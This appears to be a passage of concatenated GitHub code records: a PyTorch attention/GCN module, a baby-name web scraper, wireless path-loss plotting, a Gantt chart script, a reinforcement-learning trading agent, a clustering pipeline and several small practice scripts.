y=m) # b m 4 hw -1, v=1, c=1\n Z = Z.reshape(b, 1, m, zh * zw, -1)\n Z = repeat(Z, 'b v m i j -> b (x v) m i j', x=cv) # b 4 m hw -1, v=m\n\n t = lambda tensor: rearrange(tensor, 'b v m n d -> b v m d n')\n\n A = Q @ (torch.tanh(t(Z) @ Z) + self.label_coef) @ t(K) # b, v, m, qh*qw x kh*hw\n A = torch.relu(torch.sum(torch.tanh(A), 1).sum(1))\n\n return A, QZK # b, out_dim*[(mv+1)heads + 1], qh, qw\n\n @staticmethod\n def view_aug(x, v=0, r=False):\n assert 0 <= v <= 2\n \"v shall be in range of 0-4\"\n\n if v == 1:\n return x.flip(3) # flip vertically\n elif v == 2:\n # return x.flip(3) # flip vertically\n return x.permute(0, 1, 3, 2) # transpose\n # elif v == 3:\n # return x.transpose(2, 3).flip(3 if not r else 2) # rotation 270\n else:\n return x\n\n\nclass GCN_Layer(nn.Module):\n def __init__(self, in_features, out_features, bnorm=True,\n activation=None, dropout=None, adj=True):\n super(GCN_Layer, self).__init__()\n self.bnorm = bnorm\n self.adj = adj\n fc = [nn.Linear(in_features, out_features)]\n if bnorm:\n fc.append(BatchNorm1d_GNN(out_features))\n if activation is not None:\n fc.append(activation)\n if dropout is not None:\n fc.append(nn.Dropout(dropout))\n self.fc = nn.Sequential(*fc)\n\n def forward(self, data):\n x, A, is_norm = data\n\n if not is_norm:\n max_coef = torch.sum(A, dim=2) + 1.e-7\n A = A/max_coef.unsqueeze(dim=2)\n # A = torch.softmax(A, 2)\n # A = torch.tanh(A)\n\n y = self.fc(torch.bmm(A, x))\n\n return [y, A, True]\n\n\nclass PAF_block(nn.Module):\n def __init__(self,\n in_ch,\n hidden_ch,\n kernel=6,\n heads=3,\n m_views=4,\n depth=1,\n dropout=0.,\n norm=True,\n activation=None,\n shortcut=True,\n eps=2e-8):\n super(PAF_block, self).__init__()\n self.eps = eps\n if in_ch is None:\n self.in_ch = {'q': 256, 'z': 512, 'k': 1024}\n else:\n self.in_ch = in_ch\n\n if activation is None:\n self.activation = nn.PReLU()\n else:\n self.activation = activation\n self.sum = shortcut\n self.kernel = kernel\n self.heads = heads\n self.qzk_A = Encoder_AE(self.in_ch, self.kernel, heads, m_views)\n self.rs = nn.Sequential(\n nn.Conv2d(self.kernel * (heads * (m_views + 1) + 1),\n hidden_ch,\n kernel_size=3, stride=1, padding=1, 
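# [editor's sketch, with made-up shapes] Encoder_AE tiles a single view across the
# attention heads with einops.repeat; the pattern string names each axis and (y c)
# expands a size-1 axis by the factor y:
import torch
from einops import repeat

k = torch.randn(2, 1, 1, 64, 16)                  # b v c i j, with v = c = 1
k_tiled = repeat(k, 'b v c i j -> b v (y c) i j', y=3)
print(k_tiled.shape)                              # torch.Size([2, 1, 3, 64, 16])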
bias=False),\n self.activation,\n nn.BatchNorm2d(hidden_ch, momentum=0.01),\n nn.Dropout2d(dropout),\n )\n\n self.gcn_k = nn.ModuleList([])\n for i in range(depth):\n in_feat = self.in_ch['k'] if i == 0 else hidden_ch\n adj = True if i == 0 else False\n self.gcn_k.append(\n GCN_Layer(in_features=in_feat, out_features=hidden_ch, bnorm=norm,\n activation=self.activation, dropout=dropout, adj=adj)\n )\n\n def forward(self, x):\n b, _, hh, ww = x['q'].size()\n _, ch, kh, kw = x['k'].size()\n _, cz, zh, zw = x['z'].size()\n # ENCoder\n A, qzk= self.qzk_A(x) # b n md, b v m n d\n\n gx = x['k'].reshape(b, -1, ch)\n lap_norm = False\n\n for s, gcn in enumerate(self.gcn_k):\n if s==0:\n gx, A, lap_norm = gcn((gx, A, lap_norm))\n else:\n gx = F.interpolate(gx.reshape(b, -1, hh, ww), (kh, kw), mode='bilinear', align_corners=False)\n gx, A, lap_norm = gcn((gx.reshape(b, kh*kw, -1), A, lap_norm))\n\n\n if self.sum:\n return gx.reshape(b, -1, hh, ww) + self.rs(qzk) , A, 0\n else:\n return gx.reshape(b, -1, hh, ww), A, 0\n\n\n\n\n\n","repo_name":"samleoqh/MultiModNet","sub_path":"lib/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":6948,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"40187969125","text":"from urllib.request import urlopen as uReq\nfrom bs4 import BeautifulSoup as soup\n\nurlGirl = 'https://www.babble.com/pregnancy/1000-most-popular-girl-names/'\n\n\n# Opens a connection, grabs the page\nuClient = uReq(urlGirl)\npage_Html = uClient.read()\nuClient.close()\n\n# HTML Parsing\npage_soup = soup(page_Html, \"html.parser\")\n\n# Grabs each name\nname = page_soup.find('div',{'class':'tm-content-container tm-content-container--wide'})\n\nfilename = \"babyGirlNames.csv\"\nf = open(filename, 'w')\n\nheaders = 'Names\\n'\nf.write(headers)\n\ngirl = name.main.ol.text\n\n# Need to edit data because of unwanted 'ads' in four names\nf.write(girl.replace('Related PostBiblical Girl Names That Truly Are Timeless', ' ')) \n\n\nf.close()","repo_name":"Amonteverde04/Babies-Program","sub_path":"babyScrapeGirl/babyScrape.py/babyScrape.py.py","file_name":"babyScrape.py.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"19074535730","text":"def friispathloss(wavelength, d):\r\n return (wavelength/(4*np.pi*d))**2\r\n\r\ndef exppathloss(d, B):\r\n return 1E-3 - 10*B*np.log10(d)\r\n\r\ne = np.random.normal(0, 8, 1)\r\n\r\ndef expshadowpathloss(d, B):\r\n return 1E-3 - 10*B*np.log10(d) + e\r\n\r\ntargetcells = np.array(targetcells)\r\npowers = np.array(list(map(friispathloss, targetcells[0:, 2], distances)))\r\n\r\npowers.resize((60,1))\r\ntargetcells = np.concatenate((targetcells, powers), axis=1)\r\n\r\ncellnum = targetcells[0][1]\r\nsplits = []\r\ndiv = 0\r\n\r\nfor i in range(len(targetcells)):\r\n if targetcells[i][1] == cellnum:\r\n div += 1\r\n else: \r\n splits.append(div)\r\n div = 1\r\n cellnum = targetcells[i][1]\r\n\r\nidx = 0\r\nfor i in splits:\r\n plt.plot(range(idx,idx+i), targetcells[idx:idx+i,3:4], 'x', linestyle='-' ,label=targetcells[idx][1])\r\n idx = idx+i\r\n\r\nplt.title('Recieved Power vs. 
Time')\r\nplt.xlabel('Frame Number (30 FPS)')\r\nplt.ylabel('Recieved Power [W]')\r\n\r\nplt.legend()\r\nplt.show()\r\n\r\np3 = np.array(list(map(exppathloss, distances, np.full(\r\n shape=len(distances),\r\n fill_value=3,\r\n dtype=np.int))))\r\n\r\np3s = np.array(list(map(expshadowpathloss, distances, np.full(\r\n shape=len(distances),\r\n fill_value=3,\r\n dtype=np.int))))\r\n\r\np4 = np.array(list(map(exppathloss, distances, np.full(\r\n shape=len(distances),\r\n fill_value=4,\r\n dtype=np.int))))\r\n\r\np4s = np.array(list(map(expshadowpathloss, distances, np.full(\r\n shape=len(distances),\r\n fill_value=4,\r\n dtype=np.int))))\r\n\r\ncellnum = targetcells[0][1]\r\nsplits = []\r\ndiv = 0\r\n\r\nfor i in range(len(targetcells)):\r\n if targetcells[i][1] == cellnum:\r\n div += 1\r\n else: \r\n splits.append(div)\r\n div = 1\r\n cellnum = targetcells[i][1]\r\n\r\nsplits.append(div)\r\n\r\nidx = 0\r\nfor i in splits:\r\n plt.plot(range(idx,idx+i), np.zeros(idx+i-idx)-100, 'x', label=targetcells[idx][1])\r\n idx = idx+i\r\n\r\nplt.plot(p3, linestyle = '--', label = 'Exp 3')\r\nplt.plot(p3s, linestyle=':', label = 'Exp 3 + Shadow')\r\nplt.plot(p4, linestyle = '-.', label = 'Exp 4')\r\nplt.plot(p4s, label = 'Exp 4 + Shadow')\r\nplt.title('Downlink Signal Power vs. Time')\r\nplt.xlabel('Frame Number (30 FPS)')\r\nplt.ylabel('Downlink Signal Power [dBm]')\r\n\r\nplt.legend(bbox_to_anchor=(1,1))\r\nplt.show()\r\n\r\nfig = plt.figure()\r\nax = plt.gca()\r\nax.set_aspect(1)\r\n#plt.xlim(-300,300)\r\n#plt.ylim(-300,300)\r\nax.set_title('Cell Mobile User Animation - First Tier Downlink Interference')\r\nax.set_xlabel('X (meters)')\r\nax.set_ylabel('Y (meters)')\r\n\r\nplt.rcParams['animation.ffmpeg_path'] = '/usr/local/bin/ffmpeg'\r\nnumFrames = 60\r\nims=[]\r\nmobilePosX = np.linspace(-170,170,numFrames)\r\nmobilePosY = np.linspace(-170,170,numFrames)\r\n\r\nchannels = channelCenters(center, ni, nj, radius)\r\nall = channels.copy()\r\n\r\nzippedcells = []\r\ndistances = []\r\ntargetcells = []\r\n\r\n# Draw the serving cells and label them\r\nfor j in range(len(channels)):\r\n k = drawCluster(channels[j], N, radius)\r\n for i in range(len(k)):\r\n drawCell(k[i],radius,labels[i]+subscripts[j])\r\n cell = [k[i], labels[i]+subscripts[j], 1/frequencies[i]]\r\n zippedcells.append(cell)\r\n\r\nzippedcells = np.array(zippedcells, dtype=object)\r\n\r\nfor frames in range(numFrames):\r\n \r\n # Find the corresponding serving cell\r\n idx, distance = findServingCell([mobilePosX[frames],mobilePosY[frames]], zippedcells[0:,0])\r\n #print(channels[idx][0])\r\n distances.append(distance)\r\n targetcells.append(zippedcells[idx])\r\n # Draw a line connecting the center (basestation) of the serving cell \r\n # and the mobile user\r\n #im, = plt.plot([0,mobilePosX[frames]],[0,mobilePosY[frames]], marker = 'x', color = 'red', animated=True)\r\n\r\n im = plt.plot( [zippedcells[idx+7,0][0],mobilePosX[frames]], [zippedcells[idx+7,0][1],mobilePosY[frames]], marker = 'x', color = 'red', animated=True)\r\n im2 = plt.plot( [zippedcells[idx+14,0][0],mobilePosX[frames]], [zippedcells[idx+14,0][1],mobilePosY[frames]], marker = 'x', color = 'green', animated=True)\r\n im3 = plt.plot( [zippedcells[idx+21,0][0],mobilePosX[frames]], [zippedcells[idx+21,0][1],mobilePosY[frames]], marker = 'x', color = 'blue', animated=True)\r\n im4 = plt.plot( [zippedcells[idx+28,0][0],mobilePosX[frames]], [zippedcells[idx+28,0][1],mobilePosY[frames]], marker = 'x', color = 'red', animated=True)\r\n im5 = plt.plot( 
[zippedcells[idx+35,0][0],mobilePosX[frames]], [zippedcells[idx+35,0][1],mobilePosY[frames]], marker = 'x', color = 'green', animated=True)\r\n im6 = plt.plot( [zippedcells[idx+42,0][0],mobilePosX[frames]], [zippedcells[idx+42,0][1],mobilePosY[frames]], marker = 'x', color = 'blue', animated=True)\r\n\r\n # Draw the mobile user at the appropriate location\r\n #im2, = plt.plot(mobilePosX[frames],mobilePosY[frames],'r+', animated=True)\r\n ims.append(im+im2+im3+im4+im5+im6)\r\n\r\nani = animation.ArtistAnimation(fig, ims, interval=50, blit=True, repeat_delay=1000)\r\n\r\nrc('animation', html='jshtml')\r\nani\r\nani.save('drawCellFTI.gif', writer='pillow')\r\n#plt.show()\r\n\r\ndef dis(x1, y1, x2, y2):\r\n return np.sqrt((x1-x2)**2 + (y1-y2)**2)\r\n\r\nidxs = []\r\n\r\nfor frames in range(numFrames):\r\n # Find the corresponding serving cell\r\n idx, distance = findServingCell([mobilePosX[frames],mobilePosY[frames]], zippedcells[0:,0])\r\n idxs.append(idx)\r\n \r\n \r\n #distances.append(distance)\r\n #targetcells.append(zippedcells[idx])\r\n\r\np3iarray = []\r\np3isarray = []\r\np4iarray = []\r\np4isarray = []\r\n\r\n\r\nfor i, num in enumerate(idxs):\r\n totalpower = 0\r\n p3i = 0\r\n p3is = 0\r\n p4i = 0\r\n p4is = 0\r\n print(zippedcells[num][1])\r\n for j in range(1, 7):\r\n d = dis(mobilePosX[i], mobilePosY[i], zippedcells[0:,0][num+j*7][0], zippedcells[0:,0][num+j*7][1])\r\n \r\n p3i = p3i + exppathloss(d, 3)\r\n print(d, ':', p3i)\r\n p3is = p3is + expshadowpathloss(d, 3)\r\n p4i = p4i + exppathloss(d, 4)\r\n p4is = p4is + expshadowpathloss(d, 4)\r\n\r\n print(p3i)\r\n p3iarray.append(p3i)\r\n p3isarray.append(p3is)\r\n p4iarray.append(p4i)\r\n p4isarray.append(p4is)\r\n\r\ncellnum = targetcells[0][1]\r\nsplits = []\r\ndiv = 0\r\nprint(len(targetcells))\r\n\r\nfor i in range(len(targetcells)):\r\n if targetcells[i][1] == cellnum:\r\n div += 1\r\n\r\n else: \r\n splits.append(div)\r\n div = 1\r\n cellnum = targetcells[i][1]\r\n\r\nsplits.append(div)\r\nidx = 0\r\nprint(splits)\r\nfor i in splits:\r\n plt.plot(range(idx,idx+i), np.zeros(idx+i-idx)-700, 'x', label=targetcells[idx][1])\r\n idx = idx+i\r\n\r\nplt.plot(p3iarray, linestyle = '--', label = 'Exp 3')\r\nplt.plot(p3isarray, linestyle=':', label = 'Exp 3 + Shadow')\r\nplt.plot(p4iarray, linestyle = '-.', label = 'Exp 4')\r\nplt.plot(p4isarray, label = 'Exp 4 + Shadow')\r\nplt.title('Downlink Interference Power vs. Time')\r\nplt.xlabel('Frame Number (30 FPS)')\r\nplt.ylabel('Downlink Iterference Power [dBm]')\r\n\r\nplt.legend(bbox_to_anchor=(1,1))\r\nplt.show()\r\n\r\np3 = np.array(list(map(exppathloss, distances, np.full(\r\n shape=len(distances),\r\n fill_value=3,\r\n dtype=np.int))))\r\n\r\np3s = np.array(list(map(expshadowpathloss, distances, np.full(\r\n shape=len(distances),\r\n fill_value=3,\r\n dtype=np.int))))\r\n\r\np4 = np.array(list(map(exppathloss, distances, np.full(\r\n shape=len(distances),\r\n fill_value=4,\r\n dtype=np.int))))\r\n\r\np4s = np.array(list(map(expshadowpathloss, distances, np.full(\r\n shape=len(distances),\r\n fill_value=4,\r\n dtype=np.int))))\r\n\r\nidx = 0\r\nfor i in splits:\r\n plt.plot(range(idx,idx+i), np.zeros(idx+i-idx), 'x', label=targetcells[idx][1])\r\n idx = idx+i\r\n\r\nplt.plot(p3/p3iarray, linestyle = '--', label = 'Exp 3')\r\nplt.plot(p3s/p3isarray, linestyle=':', label = 'Exp 3 + Shadow')\r\nplt.plot(p4/p4iarray, linestyle = '-.', label = 'Exp 4')\r\nplt.plot(p4s/p4isarray, label = 'Exp 4 + Shadow')\r\nplt.title('Downlink SIR vs. 
Time')\r\nplt.xlabel('Frame Number (30 FPS)')\r\nplt.ylabel('Downlink Ratio')\r\n\r\nplt.legend(bbox_to_anchor=(1,1))\r\nplt.show()","repo_name":"chrisuzokwe/wireless-communications","sub_path":"cuzokwe-hw2/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7744,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"35660830934","text":"import plotly.express as px\nimport plotly\nimport pandas as pd\nimport xlrd\nfrom openpyxl import Workbook\nimport plotly.figure_factory as ff\n\n\n# Read Dataframe from Excel file\n# df = Workbook('task.xlsx')\n\ndf = pd.read_excel('task.xlsx')\n# df = xlrd.open_workbook('task.xlsx')\n\n# Assign Columns to variables\ntasks = df['Task']\nstart = df['Start']\nfinish = df['Finish']\ncomplete = df['Complete in %']\n\nprint(complete)\n\n# Create Gantt Chart\nfig = px.timeline(df, x_start=start, x_end=finish, y=tasks, color=complete)\n\n\"\"\" fig = px.timeline(df, x_start=start, x_end=finish, y=tasks, color=complete, title='Task Overview', \ncolor_continuous_scale = [(0, \"red\"), (0.5, \"yellow\"), (1, \"green\")]) \"\"\"\n\n# Update Change Layout - Optional\nfig.update_yaxes(autorange='reversed')\nfig.update_layout(\n title_font_size=42,\n font_size=18,\n title_font_family='Arial'\n)\n\n# Interactive Gyntt\nfig = ff.create_gantt(df)\n\n# Save Graph and export to HTML\nplotly.offline.plot(fig, filename='Task_Overview_Gantt.html')","repo_name":"Kupavtsev/Excel_Python","sub_path":"InteractiveDiagramInPython_Excel/Gant_Python.py","file_name":"Gant_Python.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71876975848","text":"from typing import Optional\nfrom listnode import ListNode, create_single_linked_list\n\nclass Solution:\n def reverseList(self, head: Optional[ListNode]) -> Optional[ListNode]:\n if not head or (head and not head.next):\n return head\n\n\n penultimate = head\n iterator = head.next\n last = None\n\n while iterator:\n last = iterator\n iterator = iterator.next\n last.next = penultimate\n if penultimate is head:\n penultimate.next = None\n penultimate = last\n\n return iterator if iterator else last\n\n\n\nsolution = Solution()\nl1 = create_single_linked_list([])\nsolution.reverseList(head = l1).print()","repo_name":"nikpopesku/leetcode","sub_path":"python/200-299/206_reverse_linked_list.py","file_name":"206_reverse_linked_list.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30134040438","text":"# # print('Hello Brian')\n# x = int(input())\n# y = int(input())\n# z = x +y\n# print(z)\n\n\n#functions\n# def sum (x,y):\n# return x+y\n\n# print(sum(6,5))\n\n#loops\nfor i in range(0,100):\n if i % 2==0:\n print(i)","repo_name":"KariukiAbel/Blockchain-Cryptocurrency-with-python","sub_path":"oop/first python script.py","file_name":"first python script.py","file_ext":"py","file_size_in_byte":215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18453385140","text":"import json\r\nimport os\r\nimport pandas as pd\r\nimport pickle\r\nfrom collections import defaultdict\r\nimport utils\r\nimport clustering\r\nimport SQL\r\n\r\n\r\n# Setting Working Directory\r\nos.chdir(r'C:\\Users\\yk659ah\\Desktop\\EY\\Proyectos\\2019\\Smart Maps')\r\n\r\n# Open Config JSON\r\nwith open('./data_models/data_models.json') as 
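# [editor's sketch for comparison -- not the submitted solution] The reversal above
# tracks `penultimate`/`last`; the textbook two-pointer form keeps a `prev` pointer
# and is easier to verify. Standalone node type so the snippet runs on its own:
class Node:
    def __init__(self, val, nxt=None):
        self.val, self.next = val, nxt

def reverse(head):
    prev = None
    while head:
        head.next, prev, head = prev, head, head.next  # relink, then advance
    return prev

h = Node(1, Node(2, Node(3)))
r = reverse(h)
print(r.val, r.next.val, r.next.next.val)  # 3 2 1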
handle:\r\n load_config = json.load(handle)\r\n\r\ndef preprocessing():\r\n \"\"\"Pipeline for pre-processing data\r\n\r\n Args:\r\n None\r\n\r\n Returns:\r\n None\r\n \"\"\"\r\n\r\n for sm in load_config['SM']:\r\n\r\n # Initialization of variables\r\n folder = sm['name']\r\n drop_cols = defaultdict(list)\r\n\r\n # Pickle load\r\n with open('./data/' + folder + '/df_' + folder + '.pickle', 'rb') as handle:\r\n df = pickle.load(handle)\r\n\r\n # Check if DataFrame is not empty\r\n if df.shape[0] == 0:\r\n\r\n print('Empty DataFrame for: ' + folder)\r\n\r\n continue\r\n\r\n ######################\r\n # METRIC CALCULATION #\r\n ######################\r\n\r\n # Calculate metrics and merge into final analysis DataFrame\r\n df = SQL.metric_calculation(df)\r\n\r\n ##################\r\n # MISSING VALUES #\r\n ##################\r\n\r\n # Correct blanks to nan\r\n df = utils.white_to_nan(df)\r\n\r\n # Check if there are any missing values, if not skip certain operations\r\n nulls = pd.isnull(df).sum().sum()\r\n\r\n if nulls > 0:\r\n\r\n # Visualize NaN values\r\n utils.missing_visuals(df)\r\n\r\n # Remove columns with high nan percentage (thresh is a minimum count of non-NA values)\r\n old_cols = df.columns\r\n df = df.dropna(axis=1, thresh=int(0.9 * len(df)))\r\n drop_cols['high_nan'].append([i for i in old_cols if i not in df.columns])\r\n\r\n # Remove rows with full nan\r\n df = df.dropna(axis=0, how='all')\r\n\r\n # Convert to datetime possible date columns\r\n df = utils.datetime_cols(df)\r\n\r\n # Create synthetic dates\r\n df = utils.synthetic_dates(df)\r\n\r\n ############\r\n # IMPUTING #\r\n ############\r\n\r\n # Initialize object\r\n dict_impute = {}\r\n\r\n if nulls > 0:\r\n\r\n dict_impute = utils.imputing_nan(df)\r\n\r\n else:\r\n\r\n dict_impute['no_impute'] = df\r\n\r\n ############\r\n # CLEANING #\r\n ############\r\n\r\n # For each imputed DataFrame\r\n for impute in dict_impute.keys():\r\n\r\n df = dict_impute[impute]\r\n\r\n # Remove duplicates\r\n df = df.drop_duplicates(keep='first')\r\n df = df.reset_index(drop=True)\r\n\r\n # Remove columns that are unique identifiers\r\n df, drop_cols = utils.remove_identifier_columns(df, drop_cols)\r\n\r\n # Remove one-value columns\r\n df, drop_cols = utils.remove_one_value_columns(df, drop_cols)\r\n\r\n # Convert to categorical possible categorical columns\r\n df, changed_cols = utils.search_categorical(df, 0.001)\r\n\r\n # Remove outliers using zscore\r\n df = utils.remove_outliers(df, 3)\r\n\r\n # Assign target labels\r\n df, target_cols = utils.apply_business_rules(df, folder)\r\n\r\n ##################\r\n # PRE-PROCESSING #\r\n ##################\r\n\r\n # Pickle save\r\n with open('./data/' + folder + '/df_' + impute + '_' + folder + '_noOHE.pickle', 'wb') as handle:\r\n pickle.dump((df, target_cols), handle)\r\n\r\n # Perform One-Hot Encoding for categorical columns\r\n df, list_new_columns, drop_cols = utils.one_hot_encoding(df, 5, 1, drop_cols)\r\n\r\n # Standardize and Normalize DataFrame\r\n df = utils.standarize_normalize(df, target_cols, list_new_columns)\r\n\r\n dict_impute[impute] = df\r\n\r\n # Pickle save\r\n with open('./data/' + folder + '/df_' + impute + '_' + folder + '_OHE.pickle', 'wb') as handle:\r\n pickle.dump((df, target_cols), handle)\r\n\r\n\r\ndef clustering_analysis(sm_name, impute):\r\n \"\"\"Pipeline for clustering analysis\r\n\r\n Args:\r\n None\r\n Returns:\r\n None\r\n \"\"\"\r\n\r\n # Pickle load\r\n with open('./data/' + sm_name + '/df_' + impute + '_' + sm_name + '_OHE.pickle', 'rb') as handle:\r\n df, target_cols = pickle.load(handle)\r\n\r\n # Separate 
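# [editor's sketch] A quick demonstration that DataFrame.dropna's `thresh` is a
# count, not a fraction: it is the minimum number of non-NA values a column must
# have to survive, so a 90% cutoff must be written as int(0.9 * len(df)).
import numpy as np
import pandas as pd

demo = pd.DataFrame({'mostly_full': [1, 2, 3, 4],
                     'mostly_nan': [1, np.nan, np.nan, np.nan]})
kept = demo.dropna(axis=1, thresh=int(0.9 * len(demo)))
print(list(kept.columns))  # ['mostly_full']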
target from DataFrame\r\n df_target = df[target_cols]\r\n df = df.drop(columns=target_cols)\r\n\r\n ###################\r\n # DISCRETIZE DATA #\r\n ###################\r\n\r\n df = utils.discretize_data(df)\r\n\r\n #######################\r\n # CLUSTERING ANALYSIS #\r\n #######################\r\n\r\n # Retrieve all clusters from different methods\r\n dict_clusters = clustering.cluster_search(df)\r\n\r\n # Pickle save\r\n with open('./data/' + sm_name + '/dict_clusters_' + impute + '_' + sm_name + '.pickle', 'wb') as handle:\r\n pickle.dump(dict_clusters, handle)\r\n\r\n # Pickle load\r\n with open('./data/' + sm_name + '/dict_clusters_' + impute + '_' + sm_name + '.pickle', 'rb') as handle:\r\n dict_clusters = pickle.load(handle)\r\n\r\n ######################\r\n # DIMENSION REDUCTION #\r\n ######################\r\n\r\n # Select k clusters based on silhouette analysis\r\n model = dict_clusters['kmeans_6']\r\n\r\n # Performing Reduction using PCA and t-SNE\r\n dict_reduction = clustering.dimension_reduction(df, model)\r\n\r\n # Pickle save\r\n with open('./data/' + sm_name + '/dict_reduction_' + impute + '_' + sm_name + '.pickle', 'wb') as handle:\r\n pickle.dump(dict_reduction, handle)\r\n\r\n # Pickle load\r\n with open('./data/' + sm_name + '/dict_reduction_' + impute + '_' + sm_name + '.pickle', 'rb') as handle:\r\n dict_reduction = pickle.load(handle)\r\n\r\n # Plot clusters for different Reductions\r\n clustering.plot_clusters(dict_reduction, df_target, 1000)\r\n","repo_name":"flying-marmot/project-utils","sub_path":"feature_engineering.py","file_name":"feature_engineering.py","file_ext":"py","file_size_in_byte":5916,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"6533720867","text":"# -*- coding:utf-8 -*-\nfrom agents.agent import Agent\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport os\n\n\nclass Actor(nn.Module):\n def __init__(self, s_dim, a_dim, b_dim, rnn_layers=1, dp=0.2):\n super(Actor, self).__init__()\n self.s_dim = s_dim\n self.a_dim = a_dim\n self.b_dim = b_dim\n self.rnn_layers = rnn_layers\n self.gru = nn.GRU(self.s_dim, 128, self.rnn_layers, batch_first=True)\n self.fc_s_1 = nn.Linear(128, 128)\n self.fc_s_2 = nn.Linear(128, 64)\n self.fc_s_out = nn.Linear(64, 1)\n self.fc_pg_1 = nn.Linear(128, 128)\n self.fc_pg_2 = nn.Linear(128, 64)\n self.fc_pg_out = nn.Linear(64, self.a_dim)\n self.relu = nn.ReLU()\n self.tanh = nn.Tanh()\n self.dropout = nn.Dropout(p=dp)\n self.softmax = nn.Softmax(dim=-1)\n self.initial_hidden = torch.zeros(self.rnn_layers, self.b_dim, 128, dtype=torch.float32)\n \n def forward(self, state, hidden=None, train=False):\n state, h = self.gru(state, hidden)\n if train:\n state = self.dropout(state)\n sn_out = self.relu(self.fc_s_1(state))\n sn_out = self.relu(self.fc_s_2(sn_out))\n sn_out = self.fc_s_out(sn_out)\n \n pn_out = self.relu(self.fc_pg_1(state))\n pn_out = self.relu(self.fc_pg_2(pn_out))\n pn_out = self.softmax(self.fc_pg_out(pn_out))\n return pn_out, sn_out, h.data\n\n\nclass RPGAgent(Agent):\n def __init__(self, s_dim, a_dim, b_dim, batch_length=64, learning_rate=1e-3, rnn_layers=1):\n super().__init__()\n self.s_dim = s_dim\n self.a_dim = a_dim\n self.b_dim = b_dim\n self.batch_length = batch_length\n self.pointer = 0\n self.s_buffer = []\n self.a_buffer = []\n self.s_next_buffer = []\n self.r_buffer = []\n \n self.train_hidden = None\n self.trade_hidden = None\n self.actor = Actor(s_dim=self.s_dim, a_dim=self.a_dim, b_dim=self.b_dim, 
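# [editor's sketch with arbitrary shapes] The REINFORCE-style loss used by RPGAgent:
# sample actions with torch.multinomial, then minimize -log pi(a) * R.
import torch

probs = torch.softmax(torch.randn(4, 3), dim=-1)   # batch of action distributions
actions = torch.multinomial(probs, 1)              # one sampled action per row, (4, 1)
rewards = torch.randn(4, 1)                        # per-sample returns
pg_loss = (-torch.log(probs.gather(1, actions)) * rewards).mean()
print(pg_loss.item())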
rnn_layers=rnn_layers)\n self.optimizer = optim.Adam(self.actor.parameters(), lr=learning_rate)\n \n def _trade(self, state, train=False):\n with torch.no_grad():\n a, _, self.trade_hidden = self.actor(state[:, None, :], self.trade_hidden, train=False)\n if train:\n return torch.multinomial(a[:, 0, :], 1)\n else:\n return a[:, 0, :].argmax(dim=1)\n \n def trade(self, state):\n state_ = torch.tensor(state,dtype=torch.float32)\n action = self._trade(state_).numpy()\n return action\n \n def train(self):\n self.optimizer.zero_grad()\n s = torch.stack(self.s_buffer).t()\n s_next = torch.stack(self.s_next_buffer).t()\n r = torch.stack(self.r_buffer).t()\n a = torch.stack(self.a_buffer).t()\n a_hat, s_next_hat, self.train_hidden = self.actor(s, self.train_hidden, train=True)\n mse_loss = torch.nn.functional.mse_loss(s_next_hat, s_next)\n nll = -torch.log(a_hat.gather(2, a))\n pg_loss = (nll * r).mean()\n loss = mse_loss + pg_loss\n loss.backward()\n for param in self.actor.parameters():\n param.grad.data.clamp_(-1, 1)\n self.optimizer.step()\n \n def reset_model(self):\n self.s_buffer = []\n self.a_buffer = []\n self.s_next_buffer = []\n self.r_buffer = []\n self.trade_hidden = None\n self.train_hidden = None\n self.pointer = 0\n \n def save_transition(self, state, action, reward, next_state):\n if self.pointer < self.batch_length:\n self.s_buffer.append(torch.tensor(state, dtype=torch.float32))\n self.a_buffer.append(torch.tensor(action))\n self.r_buffer.append(torch.tensor(reward[:, None], dtype=torch.float32))\n self.s_next_buffer.append(torch.tensor(next_state, dtype=torch.float32))\n self.pointer += 1\n else:\n self.s_buffer.pop(0)\n self.a_buffer.pop(0)\n self.r_buffer.pop(0)\n self.s_next_buffer.pop(0)\n self.s_buffer.append(torch.tensor(state, dtype=torch.float32))\n self.a_buffer.append(torch.tensor(action))\n self.r_buffer.append(torch.tensor(reward[:, None], dtype=torch.float32))\n self.s_next_buffer.append(torch.tensor(next_state, dtype=torch.float32))\n \n def load_model(self, model_path='./RPG_Torch'):\n self.actor = torch.load(model_path + '/model.pkl')\n \n def save_model(self, model_path='./RPG_Torch'):\n if not os.path.exists(model_path):\n os.mkdir(model_path)\n torch.save(self.actor, model_path + '/model.pkl')\n","repo_name":"yuriak/RLQuant","sub_path":"agents/rpg_agent.py","file_name":"rpg_agent.py","file_ext":"py","file_size_in_byte":4674,"program_lang":"python","lang":"en","doc_type":"code","stars":315,"dataset":"github-code","pt":"53"} +{"seq_id":"33125820776","text":"namen = []\nleeftijden = []\na = 0\nvraag = True\n\ndef namen_leeftijden(l):\n global vraag\n naam = input(\"Voer een naam in:\\nOf voer stop in om te stoppen:\\n>>> \")\n if naam == \"stop\":\n vraag = False\n return False\n leeftijd = input(\"Voer een leeftijd in: \")\n namen.append(naam)\n leeftijden.append(leeftijd)\n return{'naam':naam, 'leeftijd':leeftijd}\n\nwhile vraag:\n namen_leeftijden()\n \nfor i in namen:\n print(f'{i} is {leeftijden[a]} jaar')\n a +=1","repo_name":"NoaStack/leren_programmeren","sub_path":"module05_functions/namen_en_leeftijden.py","file_name":"namen_en_leeftijden.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5686233612","text":"import sys\nN = int(input())\ndata = []\nfor i in range (N) :\n word = sys.stdin.readline().rstrip()\n data.append((len(word),word))\ndata = list(set(data))\ndata.sort(key =lambda data : (data[0],data[1]))\n\nfor i in 